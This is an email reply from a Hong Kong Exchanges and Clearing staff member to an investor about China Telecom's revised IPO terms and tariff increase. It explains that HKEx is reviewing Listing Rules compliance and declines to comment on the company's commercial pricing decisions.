Dear Ms Zhang,
I refer to your enquiry dated 4 November in relation to China Telecom
Corporation Limited ("the Company; Stock Code: 728).
The Company issued an announcement on the new terms of its IPO and revised
prospectus on 5 November. Should you wish to obtain the announcement, you
could visit HKEx website at
and refer to the
Company's announcement dated 5 November, which has been posted under
Services/ Investment Service Centre/ Listed Companies Information. HKEx is
following up the case to see whether the issuer and other parties involved
in the matter contravened the Listing Rules during the IPO process and
arrangement.
The Exchange strictly enforces the Listing Rules wherever they apply in
monitoring listed companies' activities. We will follow up with the
concerned company and take appropriate regulatory actions when necessary.
As for the tariff increment as mentioned in your e-mail, kindly note such
price adjustment is a commercial decision of the Company. The Exchange is
not in a position to comment on the commercial aspects of the Company¡¦s
operation, but rather, proper disclosure of price-sensitive information by
listed issuers is always HKEx¡¦s major concern.
Best Regards,
Polly Lo
